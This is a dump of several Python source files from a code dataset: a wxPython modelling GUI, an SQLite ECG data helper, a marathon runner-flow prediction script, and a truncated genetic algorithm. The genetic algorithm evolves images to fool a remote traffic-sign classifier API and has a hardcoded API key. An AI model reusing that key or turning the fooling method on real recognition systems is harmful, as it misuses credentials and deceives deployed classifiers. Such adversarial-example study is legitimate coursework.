wx.LB_EXTENDED | wx.LB_SORT多选并且排序\n self.val_all.Bind(wx.EVT_LISTBOX, self.on_list2_fmet, self.val_all)\n\n self.tt2 = wx.StaticText(self.pfmet, label='自变量:', pos=(190, 50))\n\n self.val_top1 = wx.ListBox(self.pfmet, -1, pos=(220, 70), size=(100, 140))\n\n self.tt3 = wx.StaticText(self.pfmet, label='因变量:', pos=(220, 210))\n\n self.val_bottom1 = wx.ListBox(self.pfmet, -1, pos=(220, 230), size=(100, 140))\n\n btn1 = wx.Button(self.pfmet, label='->', pos=(170, 120), size=(30, 30))\n btn1.Bind(wx.EVT_BUTTON, self.btn1top_fmet)\n\n btn2 = wx.Button(self.pfmet, label='->', pos=(170, 280), size=(30, 30))\n btn2.Bind(wx.EVT_BUTTON, self.btn2top_fmet)\n\n self.statictext = wx.StaticText(self.pfmet, label='select_forecast:', pos=(343, 123))\n list2 = ['分类预测', '回归预测']\n self.ch2 = wx.Choice(self.pfmet, -1, choices=list2, size=(240, 22), pos=(440, 118))\n self.ch2.Bind(wx.EVT_CHOICE, self.on_choice)\n\n self.ft1 = wx.StaticText(self.pfmet, label='tree_min:', pos=(343, 153), style=wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.ft1.SetFont(font)\n self.tree_min = wx.TextCtrl(self.pfmet, size=(30, 22), pos=(440, 148), style=0)\n\n self.ft11 = wx.StaticText(self.pfmet, label='tree_spa:', pos=(472, 153), style=wx.ALIGN_CENTER)\n self.ft11.SetFont(font)\n self.tree_spa= wx.TextCtrl(self.pfmet, size=(30,22), pos=(550, 148), style=0)\n\n self.ft12 = wx.StaticText(self.pfmet, label='tree_max:', pos=(582, 153), style=wx.ALIGN_CENTER)\n self.ft12.SetFont(font)\n self.tree_max = wx.TextCtrl(self.pfmet, size=(30, 22), pos=(655, 148), style=0)\n\n self.ft2 = wx.StaticText(self.pfmet, label='tree_depth:', pos=(343, 183), style=wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.ft2.SetFont(font)\n self.tree_depth = wx.TextCtrl(self.pfmet, size=(240, 22), pos=(440, 178))\n\n self.ft3 = wx.StaticText(self.pfmet, label='ratio:', pos=(343, 213), style=wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.ft3.SetFont(font)\n self.ratio = wx.TextCtrl(self.pfmet, value=\"7:3\", size=(240, 22), pos=(440, 208), style=wx.TE_READONLY)\n\n btn3 = wx.Button(self.pfmet, label='开始建模', pos=(400, 243), size=(240, 30))\n btn3.Bind(wx.EVT_BUTTON, self.btn3rec_fmet)\n\n self.pfmet.SetSizer(Box_Fmet)\n\n self.frame_fmet.Show()\n self.frame_fmet.Centre()\n\n def on_choice(self,event):\n self.choose = event.GetString()\n\n def getSortParam(self):\n return int(self.tree_min.GetValue()), int(self.tree_spa.GetValue()), \\\n int(self.tree_max.GetValue()), int(self.tree_depth.GetValue())\n\n def btn3rec_fmet(self,event):\n y1 = []\n y2 = []\n self.corr = ''\n self.train_corr = ''\n\n tree_min, tree_spa, tree_max, tree_depth = self.getSortParam()\n\n if self.choose == u'分类预测':\n start = time.clock()\n corrs, train_corrs = sr.sortResult(self.filepath, tree_min, tree_max, tree_spa, tree_depth)\n end = time.clock()\n\n best_trees = 0\n best_train_trees = 0\n max_train_corr = max(train_corrs)\n max_corr = max(corrs)\n for index, value in enumerate(corrs):\n if max_corr == value:\n best_trees = index\n break\n for index, value in enumerate(train_corrs):\n if max_train_corr == value:\n best_train_trees = index\n break\n\n # print self.corr\n self.frame2 = wx.Frame(parent=None, title='随机森林分类建模结果', size=(800, 600))\n y1 = corrs\n y2 = train_corrs\n self.str_corr = \"\"\"\n 尊敬的用户,分类建模最好时结果如下:\n ---------------------\n 建模所耗时间:{}s\n 最好时训练集决策树:{}\n 此时训练集分类准确率:{}\n 最好时测试集决策树:{}\n 此时测试集分类准确率:{}\n ---------------------\n 决策树的深度:{}\n 训练集和测试集之比:7:3\n 单颗树划分属性标准:信息增益\n 叶子节点处理方式:投票选择\n \"\"\".format(end - start, tree_min+best_train_trees*tree_spa,\n max_train_corr, tree_min+best_trees*tree_spa, max_corr, tree_depth)\n else:\n start = time.clock()\n\n labels, averageTraRss, averageOptRss, min_ave_optrss, \\\n min_ave_trarss, everyopt, everytra = \\\n re.regreResult(self.filepath, tree_min,\n tree_spa, tree_max, tree_depth)\n\n end = time.clock()\n self.frame2 = wx.Frame(parent=None, title='随机森林改进建模对比结果', size=(800, 600))\n\n y1 = averageTraRss\n y2 = averageOptRss\n self.str_corr = \"\"\"\n 尊敬的用户,回归建模结果如下:\n ---------------------------\n 建立模型耗时:{}s\n 传统随机森林测试集残差平方和:{}\n 改进随机森林测试集残差平方和:{}\n 传统随机森林测试集平均相对误差:{}\n 改进随机森林测试集平均相对误差:{}\n ---------------------------\n 决策树深度:{}\n 训练集和测试集之比:7:3\n 单颗树划分属性标准:方差\n 叶子节点处理方式:取平均值\n \"\"\".format(end - start, min_ave_trarss, min_ave_optrss,\n everytra, everyopt, tree_depth)\n\n p2 = wx.Panel(self.frame2)\n\n Box_ms = wx.BoxSizer(wx.VERTICAL)\n\n tc1 = wx.StaticText(p2, label='建模结果:')\n Box_ms.Add(tc1, 0, wx.TOP | wx.LEFT, border=5)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n tc1.SetFont(font)\n\n tc2 = wx.TextCtrl(p2, value=self.str_corr, style=(wx.TE_MULTILINE | wx.TE_DONTWRAP | wx.TE_READONLY),\n size=(800, 200))\n Box_ms.Add(tc2, 0)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n tc2.SetFont(font)\n\n figure = Figure()\n axes = figure.add_subplot(111)\n canvas = FigureCanvas(p2, -1, figure)\n Box_ms.Add(canvas, 1, wx.LEFT | wx.TOP | wx.GROW)\n p2.Fit()\n\n x = []\n for i in range(tree_min, tree_max + 1, tree_spa):\n x.append(i)\n\n axes.plot(x, y1, label='tra')\n axes.plot(x, y2, color='red', label='opt')\n\n p2.SetSizer(Box_ms)\n\n self.frame2.Show()\n self.frame2.Centre()\n\n\n def on_list2_fmet(self,event):\n self.listbox2 = event.GetEventObject()\n\n def btn1top_fmet(self, event):\n self.val_top1.Destroy()\n f1 = self.listbox2.GetSelections()\n self.sel1 = []\n global label\n # print(label)\n for i in f1:\n self.sel1.append(label[i])\n # print(self.sel1)\n self.val_top = wx.ListBox(self.pfmet, -1, choices=self.sel1, style=wx.LB_EXTENDED, pos=(220, 70), size=(100, 140))\n\n def btn2top_fmet(self, event):\n self.val_bottom1.Destroy()\n f1 = self.listbox2.GetSelections()\n self.sel2 = []\n global label\n # print(label)\n for i in f1:\n self.sel2.append(label[i])\n # print(self.sel2)\n self.val_bottom = wx.ListBox(self.pfmet, -1, choices=self.sel2, style=wx.LB_EXTENDED, pos=(220, 230),\n size=(100, 140))\n\n\nclass AboutDialog(wx.Dialog):\n\n def __init__(self):\n wx.Dialog.__init__(self, parent=None, id=200, title='计算提升度',size=(500,500))\n global label\n Label = list(map(str,label))\n\n self.val_all = wx.ListBox(self, -1, choices = Label,style=wx.LB_EXTENDED ,pos =(100,50), size =(100,300)) # wx.LB_EXTENDED | wx.LB_SORT多选并且排序\n self.Bind(wx.EVT_LISTBOX, self.on_list2, self.val_all)\n\n self.val_top1 = wx.ListBox(self,-1, pos=(260, 50),size = (100,140))\n\n self.val_bottom1 = wx.ListBox(self, -1,pos=(260, 210),size = (100,140))\n\n btn1 = wx.Button(self, label='->', pos=(210, 100), size=(30, 30))\n btn1.Bind(wx.EVT_BUTTON,self.btn1top)\n\n btn2 = wx.Button(self, label='->', pos=(210, 260), size=(30, 30))\n btn2.Bind(wx.EVT_BUTTON, self.btn2top)\n\n btn3 = wx.Button(self, label='开始计算', pos=(180, 370), size=(100,35))\n btn3.Bind(wx.EVT_BUTTON, self.btn3rec)\n\n#获取参数值\n def Getvalue1(self):\n return self.val1.GetValue()\n\n def Getvalue2(self):\n return self.val2.GetValue()\n#打印参数\n def OnClick(self,event):\n\n print('参数1:',self.val1.GetValue())\n print('参数2:',self.val2.GetValue())\n\n def on_list2(self,event):\n self.listbox2 = event.GetEventObject()\n print(self.listbox2)\n #print(type(listbox2.GetSelections()))\n print('listbox2:' + str(self.listbox2.GetSelections()))\n\n def btn1top(self,event):\n self.val_top1.Destroy()\n f1 = self.listbox2.GetSelections()\n self.sel1 = []\n global label\n #print(label)\n for i in f1:\n self.sel1.append(label[i])\n print(self.sel1)\n self.val_top = wx.ListBox(self,-1,choices = self.sel1 ,style=wx.LB_EXTENDED, pos=(260, 50), size=(100, 140))\n\n def btn2top(self,event):\n self.val_bottom1.Destroy()\n f1 = self.listbox2.GetSelections()\n self.sel2 = []\n global label\n #print(label)\n for i in f1:\n self.sel2.append(label[i])\n print(self.sel2)\n self.val_bottom = wx.ListBox(self,-1,choices = self.sel2 ,style=wx.LB_EXTENDED, pos=(260, 210),size = (100,140))\n\n def btn3rec(self,event):\n print('自变量:'+str(self.sel1))\n print('因变量:'+str(self.sel2))\n\n\n\nif __name__ == '__main__':\n app = wx.App(0)\n frame = TestFrame()\n frame.InitUI()\n app.MainLoop()","sub_path":"GUI/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":23229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"253438118","text":"import sqlite3 as sql3\n\n\ndef upload(time, ecg, pvcs):\n conn = sql3.connect('hmdata.db')\n c = conn.cursor()\n\n c.execute(\"DROP TABLE IF EXISTS ecg_data\")\n c.execute(\"CREATE TABLE ecg_data (IND INTEGER, TIME REAL, ECG REAL)\")\n\n c.execute(\"DROP TABLE IF EXISTS metadata\")\n c.execute(\"CREATE TABLE metadata (LENGTH INTEGER)\")\n c.execute(\"INSERT INTO metadata (LENGTH) VALUES(?)\", [len(ecg)])\n\n c.execute(\"DROP TABLE IF EXISTS pvc_data\")\n c.execute(\"CREATE TABLE pvc_data (IND INTEGER, CERTAINTY INTEGER)\")\n\n for i, (t, e) in enumerate(zip(time, ecg)):\n c.execute(\n \"INSERT INTO ecg_data (IND, TIME, ECG) VALUES(?, ?, ?)\",\n (i, float(t), float(e))\n )\n\n for (ind, certainty) in pvcs:\n c.execute(\n \"INSERT INTO pvc_data (IND, CERTAINTY) VALUES(?, ?)\",\n (int(ind), int(certainty))\n )\n\n conn.commit()\n conn.close()\n\n\ndef query_length():\n conn = sql3.connect('hmdata.db')\n c = conn.cursor()\n result = c.execute(\"SELECT LENGTH FROM metadata\").fetchone()[0]\n c.close()\n return result\n\n\ndef query_pvcs():\n conn = sql3.connect('hmdata.db')\n c = conn.cursor()\n result = c.execute(\"SELECT IND, CERTAINTY FROM pvc_data\").fetchall()\n c.close()\n return [[i, c] for (i, c) in result]\n\n\ndef query_data(start, end):\n conn = sql3.connect('hmdata.db')\n c = conn.cursor()\n result = c.execute(\"\"\"\n SELECT TIME, ECG FROM ecg_data\n WHERE TIME >= ? and TIME < ?\n ORDER BY TIME\n \"\"\", [start, end]).fetchall()\n time, ecg = zip(*result)\n c.close()\n return time, [float(s) for s in ecg]\n\n\ndef query_point(point):\n conn = sql3.connect('hmdata.db')\n c = conn.cursor()\n time, ecg = c.execute(\"\"\"\n SELECT TIME, ECG FROM ecg_data\n WHERE IND = ?\n ORDER BY TIME\n \"\"\", [int(point)]).fetchone()\n c.close()\n result = (time, float(ecg))\n return result\n","sub_path":"database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"603902113","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sep. 29, 2020\n建立馬拉松賽事跑者人流分析與預測模型\nRaw data: 田中馬拉松(2017年、2018年、2019年),全馬組跑者成績紀錄\nFeature: 跑速、感應點距離(離起跑點)、馬拉松舒適指數(環境因子、體感因子等9項)、\n 預測成績(起跑後通過某個感應點時間(秒), delta_time)(輸入特徵值進行正規化處理)\nOutput: 預測人數\n@author: Wen-Hsin Yang\n\"\"\"\n\nimport os\nimport math\nimport joblib #pkl模型 format\nimport pandas as pd\nimport seaborn as sns\nimport xgboost as xgb\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\n#from mpl_toolkits.mplot3d import Axes3D\n\n# Register converters to avoid warnings\npd.plotting.register_matplotlib_converters()\nplt.rc(\"figure\", figsize=(16,12))\nplt.rc(\"font\", size=16)\nplt.rcParams['axes.unicode_minus'] = False # 修復負號顯示問題(正黑體)\n\n#####################\n# declare functions #\n#####################\n##\n# remove leading and trailing characters of each value across all cells in dataframe\ndef trim_all_cells(df):\n # trim whitespace from ends of each value across all series in dataframe\n trim_strings = lambda x: x.strip() if isinstance(x, str) else x\n return df.applymap(trim_strings)\n\ndef heatmap(x, y, size, corr):\n ###\n # heatmap 1: demonstrate the correlation of each two features in terms of the size of correlated ratio (position/negative)\n ##\n fig, ax = plt.subplots(figsize=(16,12))\n # Mapping from column names to integer coordinates\n x_labels = [v for v in sorted(x.unique())]\n y_labels = [v for v in sorted(y.unique())]\n\n x_to_num = {p[1]:p[0] for p in enumerate(x_labels)}\n y_to_num = {p[1]:p[0] for p in enumerate(y_labels)}\n \n #sns.set(font=['sans-serif'])\n size_scale = 300\n ax.scatter(\n x=x.map(x_to_num), # Use mapping for x\n y=y.map(y_to_num), # Use mapping for y\n s=size * size_scale, # Vector of square sizes, proportional to size parameter\n marker='s' # Use square as scatterplot marker\n )\n \n # Show column labels on the axes\n ax.set_xticks([x_to_num[v] for v in x_labels])\n ax.set_xticklabels(x_labels, rotation=45, horizontalalignment='right')\n ax.set_yticks([y_to_num[v] for v in y_labels])\n ax.set_yticklabels(y_labels)\n ax.grid(True, 'minor')\n ax.set_xticks([t + 0.5 for t in ax.get_xticks()], minor=True)\n ax.set_yticks([t + 0.5 for t in ax.get_yticks()], minor=True)\n ax.set_xlim([-0.5, max([v for v in x_to_num.values()]) + 0.5]) \n ax.set_ylim([-0.5, max([v for v in y_to_num.values()]) + 0.5])\n ax.set_title('跑拉松跑者人流分析預測(Feature Correlation)')\n ax.set_xlabel('特徵')\n ax.set_ylabel('特徵')\n plt.show() # display the graph\n # save figure to the file\n figfile = os.path.join(figpath, 'Feature Correlation_1.jpg')\n fig.savefig(figfile) # save the graph into a file \n \n ###\n # heatmap 2: demonstrate the correlation of each two features in terms of the correlated ratio\n ##\n fig, ax1 = plt.subplots(figsize=(16,12))\n corr = corr.pivot('x', 'y', 'value')\n ax1 = sns.heatmap(corr, vmax=1, vmin=-1, cmap='coolwarm', center=0, robust=True,\n annot=True, annot_kws={'size':16}, fmt='.1f',\n linewidths=0.5, square=True)\n ax1.set_xticklabels(ax1.get_yticklabels(), rotation=45, fontsize=16)\n ax1.set_title('跑拉松跑者人流分析預測(Feature Correlation)')\n ax1.set_xlabel('特徵 feature')\n ax1.set_ylabel('特徵 feature')\n plt.show()\n # save figure to the file\n figfile = os.path.join(figpath, 'Feature Correlation_2.jpg')\n fig.savefig(figfile) # save the graph into a file \n \n################\n# main program #\n################\nif __name__ == '__main__':\n ###\n # initialize environment's configuration\n ##\n # home directory\n base_dir = os.path.dirname(__file__)\n # directory for training data\n datapath = os.path.join(base_dir, 'data')\n if not os.path.isdir(datapath):\n os.mkdir(datapath)\n # directory for storing the figurer that are run by the trained model\n figpath = os.path.join(base_dir, 'figure')\n if not os.path.isdir(figpath):\n os.mkdir(figpath)\n # directory for storing the trainned model\n savepath = os.path.join(base_dir, 'model')\n if not os.path.isdir(savepath):\n os.mkdir(savepath) \n \n ###\n # step 1: conduct data preprocessing\n ##\n # read into the dataset \n datafile = os.path.join(datapath, 'dataset.xlsx')\n df = pd.read_excel(datafile,\n usecols=['預測人數', '預測時間',\n '速度', '距離', '溫度', '濕度', '熱中暑危險係數',\n '空氣品質指標', '細懸浮微粒', '蒲福風級', '小時雨量', '比例'])\n trim_all_cells(df) # remove leading and tailing white space of string (content of cell in dataframe)\n df.dropna(inplace=True) # omit the row of data in which any NAN value is contained \n \n # normalized by using MinMax standarization for features (in the dataframe X)\n X = pd.DataFrame()\n sc1 = MinMaxScaler() # range 0~1\n \n # 跑步速度 (0~22 km/h)\n sc = MinMaxScaler(feature_range=(0, 22))\n x_speed1 = pd.DataFrame(sc.fit_transform(df[['速度']].astype(float)))\n x_speed = pd.DataFrame(sc1.fit_transform(x_speed1[:].astype(float)))\n x_speed.columns = ['速度']\n \n # 感應點位置(距離) (0~43,000 m)\n sc = MinMaxScaler(feature_range=(0, 43000))\n x_dist1 = pd.DataFrame(sc.fit_transform(df[['距離']].astype(float)))\n x_dist = pd.DataFrame(sc1.fit_transform(x_dist1[:].astype(float)))\n x_dist.columns = ['距離'] \n \n # 體感因子(溫度) (0~40 度C)\n sc = MinMaxScaler(feature_range=(0, 40))\n x_temp1 = pd.DataFrame(sc.fit_transform(df[['溫度']].astype(float)))\n x_temp = pd.DataFrame(sc1.fit_transform(x_temp1[:].astype(float)))\n x_temp.columns = ['溫度']\n \n # 體感因子(濕度)(0~100 %)\n sc = MinMaxScaler(feature_range=(0, 100))\n x_hum1 = pd.DataFrame(sc.fit_transform(df[['濕度']].astype(float)))\n x_hum = pd.DataFrame(sc1.fit_transform(x_hum1[:].astype(float)))\n x_hum.columns = ['濕度']\n \n # 體感因子(熱中暑危險係數 Heat Index)(0~100 度C)\n sc = MinMaxScaler(feature_range=(0, 100))\n x_hi1 = pd.DataFrame(sc.fit_transform(df[['熱中暑危險係數']].astype(float)))\n x_hi = pd.DataFrame(sc1.fit_transform(x_hi1[:].astype(float)))\n x_hi.columns = ['熱中暑危險係數']\n \n # 環境因子(空氣品質指標 AQI) (0~200)\n sc = MinMaxScaler(feature_range=(0, 200))\n x_aqi1 = pd.DataFrame(sc.fit_transform(df[['空氣品質指標']].astype(float)))\n x_aqi = pd.DataFrame(sc1.fit_transform(x_aqi1[:].astype(float)))\n x_aqi.columns = ['空氣品質指標']\n \n # 環境因子(細懸浮微粒 PM2.5) (0~72)\n sc = MinMaxScaler(feature_range=(0, 72))\n x_pm1 = pd.DataFrame(sc.fit_transform(df[['細懸浮微粒']].astype(float)))\n x_pm = pd.DataFrame(sc1.fit_transform(x_pm1[:].astype(float)))\n x_pm.columns = ['細懸浮微粒']\n \n # 環境因子(蒲福風級) (0~5 級風)\n sc = MinMaxScaler(feature_range=(0, 5))\n x_wr1 = pd.DataFrame(sc.fit_transform(df[['蒲福風級']].astype(float)))\n x_wr = pd.DataFrame(sc1.fit_transform(x_wr1[:].astype(float)))\n x_wr.columns = ['蒲福風級']\n \n # 環境因子(小時雨量) (0~41 mm/h)\n sc = MinMaxScaler(feature_range=(0, 41))\n x_hr1 = pd.DataFrame(sc.fit_transform(df[['小時雨量']].astype(float)))\n x_hr = pd.DataFrame(sc1.fit_transform(x_hr1[:].astype(float)))\n x_hr.columns = ['小時雨量']\n\n # 感應點觀測時間(在某個感應點特定的時間,觀察之後每10分鐘持續1小時,通過感應的人數) (0~關門時間 sec.)\n sc = MinMaxScaler() #MinMaxScaler(feature_range=(0, 21600))\n x_score1 = pd.DataFrame(sc.fit_transform(df[['預測時間']].astype(float)))\n x_score = pd.DataFrame(sc1.fit_transform(x_score1[:].astype(float)))\n x_score.columns = ['預測時間']\n range_runscore = sc.data_max_ # keep the maximal value in the configuration\n \n # combine all features as the dataframe X\n X = pd.concat([x_speed, x_dist, x_temp, x_hum, x_hi, x_aqi, x_pm, x_wr, x_hr, x_score], axis=1)\n # assign columns' labels into the training dataset\n X.columns = ['速度', '距離', '溫度', '濕度', '熱中暑危險係數', \n '空氣品質指標', '細懸浮微粒', '蒲福風級', '小時雨量', '預測時間']\n\n # applying MinMax scheme to normalize the prediction factors (i.e., the runners' number w.r.t. running flow and runners' scores)\n y = pd.DataFrame()\n # forecasted number of runners in a flow\n sc = MinMaxScaler() \n y_flow1 = pd.DataFrame(sc.fit_transform(df[['預測人數']].astype(float)))\n y_flow = pd.DataFrame(sc1.fit_transform(y_flow1[:].astype(float)))\n y_flow.columns = ['預測人數']\n range_runflow = sc.data_max_ # keep the maximal number in the configuration \n # establish y by concatting flow_number and scores\n y = y_flow #pd.concat([y_flow, y_score], axis=1)\n \n y = sc.fit_transform(df[['比例']])\n \n num_runner = 3854 # 預測該場全馬賽事之參賽(或報名)人數, default=3,854\n \n # keep the normalization parameters of the features in the configuration file\n config_df = pd.DataFrame(\n {'鳴槍時間' : 21600, # 6 a.m.\n '速度' : 22, # range 0~22\n '距離' : 43000, # range 0~43,000\n '溫度' : 40, # range 0~40\n '濕度' : 100, # range 0~100\n '熱中暑危險係數' : 100, # range 0~100\n '空氣品質指標' : 200, # range 0~200\n '細懸浮微粒' : 72, # range 0~72\n '蒲福風級' : 5, # range 0~5\n '小時雨量' : 41, # range 0~41 mm/hr\n # instead of 預測時間, we rename to 觀測時間 on the specific Station due to fitting the usage scenario\n '預測時間' : range_runscore, # range 0~range_runsore sec. 關門時間,\n '預測人數(最多)' : range_runflow, # maximal number of runners in the training data \n '全馬參賽(或報名)人數' : num_runner # 預測該場全馬賽事之參賽(或報名)人數\n })\n configfile = os.path.join(savepath, 'config.xlsx')\n config_df.to_excel(configfile, index=False, encoding='cp950')\n \n ###\n # step 2: split training and testing datasets\n ##\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42)\n \n ###\n # step 3: train a model (univariate random forest regression)\n ##\n print('----------------------- RandomForestRegressor')\n \n # generate random forest regression model\n rf_reg_flow = RandomForestRegressor()\n rf_reg_flow.fit(X_train, y_train.ravel()) \n \n # evaluate model (univariate random forest regression)\n y_flow_pred = rf_reg_flow.predict(X_test) \n mse = mean_squared_error(y_test, y_flow_pred) * num_runner\n rmse = math.sqrt(mse)\n print(\"MSE, RMSE: %f %f\" % (mse, rmse))\n print('score= {a}'.format(a=rf_reg_flow.score(X_test, y_test)))\n print('importance= {a}'.format(a=rf_reg_flow.feature_importances_))\n \n # visualize the prediction result: 觀測時間 vs 預測人數\n # input: '觀測時間' in X-axis\n # output: '預測人數' in Y-axis\n plt.rc(\"figure\", figsize=(16,10))\n plt.rc(\"font\", size=16)\n plt.rcParams['axes.unicode_minus'] = False # 修復負號顯示問題(正黑體)\n fig, ax = plt.subplots(figsize=(16, 12)) \n # real results in the testing data\n X1 = df.loc[X_test.index] # take back original dataframe values w.r.t X.test which have conducted normalization \n ax.scatter(X1['預測時間'], y_test * num_runner, c='blue', marker='s', alpha=0.6, label='田中馬_全馬組(2017~2019年)紀錄')\n #ax.scatter(X_test['預測時間'], y_test, c='blue', marker='s', alpha=0.6, label='田中馬_全馬組(2017~2019年)紀錄')\n # predicted results w.r.t. testing data\n ax.scatter(X1['預測時間'], y_flow_pred * num_runner, c='red', marker='x', label='預測模型(Random Forest Regression)')\n #ax.scatter(X_test['預測時間'], y_flow_pred, c='red', marker='x', label='預測模型(Random Forest Regression)')\n ax.set_xlabel('觀測時間 (單位:秒)', fontsize=16) \n ax.set_ylabel('人數 (單位:人)', fontsize=16) \n ax.legend()\n ax.grid(True)\n plt.show() # display the graph\n # save figure to the file\n figfile = os.path.join(figpath, '預估人流_RF.jpg')\n fig.savefig(figfile) # save the graph into a file \n\n ###\n # step 4: keep training model\n ## \n # save model using joblib package\n savefile = os.path.join(savepath, 'rf_reg_flow(joblib).pkl')\n joblib.dump(rf_reg_flow, savefile) \n '''\n #check saved model\n rf_reg_1_flow = joblib.load(savefile)\n print('** save model then checking for it (rf_reg_flow)')\n print(rf_reg_1_flow.predict(X_test) \n '''\n \n ###\n # step 5: observe the correlation between any two features\n ##\n columns = ['速度', '距離', '溫度', '濕度', '熱中暑危險係數', '空氣品質指標', \n '細懸浮微粒', '蒲福風級', '小時雨量', '預測時間', '預測人數', '比例'] \n corr = df[columns].corr()\n corr = pd.melt(corr.reset_index(), id_vars='index') # Unpivot the dataframe, so we can get pair of arrays for x and y\n corr.columns = ['x', 'y', 'value']\n heatmap(x=corr['x'], y=corr['y'], size=corr['value'].abs(), corr=corr)\n \n ##\n # evaluate XGBoost reg:squarederror\n ##\n print('----------------------- XGBRegressor')\n xgb_reg = xgb.XGBRegressor(objective = 'reg:squarederror',\n #learning_rate = 0.1,\n #max_depth = 30,\n #subsample = 0.5,\n #colsample_bytree = 0.5,\n #alpha = 0.1,\n n_estimators = 5000)\n xgb_reg.fit(X_train, y_train)\n y_flow_pred = xgb_reg.predict(X_test)\n mse = mean_squared_error(y_test, y_flow_pred) * num_runner\n rmse = math.sqrt(mse)\n print(\"MSE, RMSE: %f %f\" % (mse, rmse))\n \n # save model using joblib package\n savefile = os.path.join(savepath, 'xgboost_reg_flow(joblib).pkl')\n joblib.dump(xgb_reg, savefile)\n '''\n #check saved model\n xgb_reg_1_flow = joblib.load(savefile) \n print('** save model then checking for it (xgboost_reg_flow)')\n print(xgb_reg_1_flow.predict(X_test)*num_runner) \n '''\n \n #plt.rc(\"figure\", figsize=(16, 10))\n #plt.rc(\"font\", size=16)\n #plt.rcParams['axes.unicode_minus'] = False # 修復負號顯示問題(正黑體) \n \n xgb.plot_tree(xgb_reg, num_trees=12)\n xgb.plot_importance(xgb_reg)\n plt.show()\n \n # visualize the prediction result: 觀測時間 vs 預測人數\n # input: '觀測時間' in X-axis\n # output: '預測人數' in Y-axis\n plt.rc(\"figure\", figsize=(16,12))\n plt.rc(\"font\", size=16)\n plt.rcParams['axes.unicode_minus'] = False # 修復負號顯示問題(正黑體)\n fig, ax = plt.subplots(figsize=(16, 12)) \n # real results in the testing data\n X1 = df.loc[X_test.index] # take back original dataframe values w.r.t X.test which have conducted normalization \n ax.scatter(X1['預測時間'], y_test * num_runner, c='blue', marker='s', alpha=0.6, label='田中馬_全馬組(2017~2019年)紀錄')\n #ax.scatter(X_test['預測時間'], y_test, c='blue', marker='s', alpha=0.6, label='田中馬_全馬組(2017~2019年)紀錄')\n # predicted results w.r.t. testing data\n ax.scatter(X1['預測時間'], y_flow_pred * num_runner, c='red', marker='x', label='預測模型(XGBoost Regression)')\n #ax.scatter(X_test['預測時間'], y_flow_pred, c='red', marker='x', label='預測模型(XGBoost Regression)')\n ax.set_xlabel('觀測時間 (單位:秒)', fontsize=16) \n ax.set_ylabel('人數 (單位:人)', fontsize=16) \n ax.legend()\n ax.grid(True)\n plt.show() # display the graph\n # save figure to the file\n figfile = os.path.join(figpath, '預估人流_XGBoost.jpg')\n fig.savefig(figfile) # save the graph into a file \n\n###############\n# end of file #\n############### ","sub_path":"runflow_20200929.py","file_name":"runflow_20200929.py","file_ext":"py","file_size_in_byte":16672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"81498079","text":"import requests\nimport os\nimport skimage\nimport random\nimport json\nimport webbrowser\nimport time\nimport itertools\nimport pandas as pd\nfrom PIL import Image, ImageDraw\n\nglobal population\nglobal api_calls\nglobal stop\nglobal MUTATION_RATE\nshape = ((16, 16), (48,16), (16,48), (48,48))\npopulation = []\napi_calls = 0\nstop = False\nMUTATION_RATE = 10\n\n\ndef contrast(color1, color2):\n return abs(color1[0] - color2[0]) + abs(color1[1] - color2[1]) + abs(color1[2] - color2[2])\n\n\ndef generateImage(foreground, background):\n # set image format\n img = Image.new('RGB', (64, 64), color='black')\n draw = ImageDraw.Draw(img)\n\n #background fill\n draw.rectangle(((0,0),(64,64)), background)\n #draw shape\n draw.polygon(shape, foreground)\n \n return {\"image\": img, \"confidence\": 0, \"background\": background, \"foreground\": foreground, \"class\": \"\", \"contrast\": contrast(foreground, background)}\n\n\n# eval fitness for each individual\ndef evalFitness():\n global api_calls\n global stop\n for individual in population:\n name = 'toEval.png'\n image = individual[\"image\"]\n image.save(name)\n payload= {'key': 'Engeibei1uok4xaecahChug6eihos0wo'}\n r = requests.post('https://phinau.de/trasi', data=payload, files={'image': open(name, 'rb')})\n api_calls += 1\n if api_calls >= 60:\n #print(individual[\"foreground\"])\n time.sleep(60)\n api_calls = 0\n try:\n individual[\"confidence\"] = r.json()[0][\"confidence\"]\n individual[\"class\"] = r.json()[0][\"class\"].encode('utf-8')\n except ValueError:\n print(\"Decoding JSON failed -> hit API rate :(\")\n stop = True\n break\n \n \n# create initial population\ndef initPopulation(count):\n for i in range(count):\n population.append(generateImage())\n\n#create population of contrast combinations\ndef initConstrastPopulation():\n seq = [ 28 * i for i in range(10)]\n for (r, g, b) in itertools.product(seq, seq, seq):\n population.append(generateImage( (r, g, b), (255 - r, 255 - g, 255 - b) ))\n \n# select best individuals from population\ndef selection(bestCount):\n population.sort(key=lambda individual: individual[\"confidence\"], reverse=True)\n del population[bestCount:]\n\n# crossover between individuals in the population\ndef crossover():\n # IMPLEMENT HERE YOUR CROSSOVER FUNCTION\n # EXAMPLE: cross rectangles, generate new images\n for j in range(len(population)-1):\n background = population[0 + j][\"background\"]\n foreground = population[1 + j][\"foreground\"]\n img = Image.new('RGB', (64, 64), color='black')\n draw = ImageDraw.Draw(img)\n \n draw.rectangle(((0,0),(64,64)), background)\n \n draw.polygon(shape, foreground)\n \n population.append({\"image\": img, \"confidence\": 0, \"background\": background, \"foreground\": foreground, \"class\": \"\"})\n\n# mutate each individual in the population and delete old population\ndef mutate(confidence):\n # IMPLEMENT HERE YOUR MUTATION FUNCTION\n # EXAMPLE: mutate colors of random rectangle\n population_size = len(population)\n for j in range(len(population)):\n img = 